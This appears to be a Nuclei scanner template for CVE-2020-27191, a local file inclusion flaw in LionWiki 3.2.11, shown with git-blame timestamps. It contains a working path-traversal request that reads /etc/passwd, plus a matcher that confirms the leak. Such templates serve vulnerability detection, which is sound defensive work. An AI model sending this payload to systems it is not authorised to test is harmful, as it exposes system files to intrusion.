nuclei-templates/cves/2020/CVE-2020-27191.yaml

33 lines
958 B
YAML
Raw Normal View History

2022-04-04 10:50:53 +00:00
id: CVE-2020-27191
2022-04-04 10:50:53 +00:00
info:
name: LionWiki 3.2.11 - LFI
author: 0x_Akoko
severity: high
2022-04-04 12:37:53 +00:00
description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion.
2022-04-04 10:50:53 +00:00
reference:
- https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
- http://lionwiki.0o.cz/index.php?page=Main+page
2022-04-04 10:50:53 +00:00
- https://www.cvedetails.com/cve/CVE-2020-27191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-27191
cwe-id: CWE-22
2022-04-04 12:37:53 +00:00
tags: cve,cve2020,lionwiki,lfi,oss
2022-04-04 10:50:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"
matchers-condition: and
matchers:
- type: regex
regex:
2022-04-04 12:37:53 +00:00
- "root:[x*]:0:0:"
2022-04-04 10:50:53 +00:00
- type: status
status:
- 200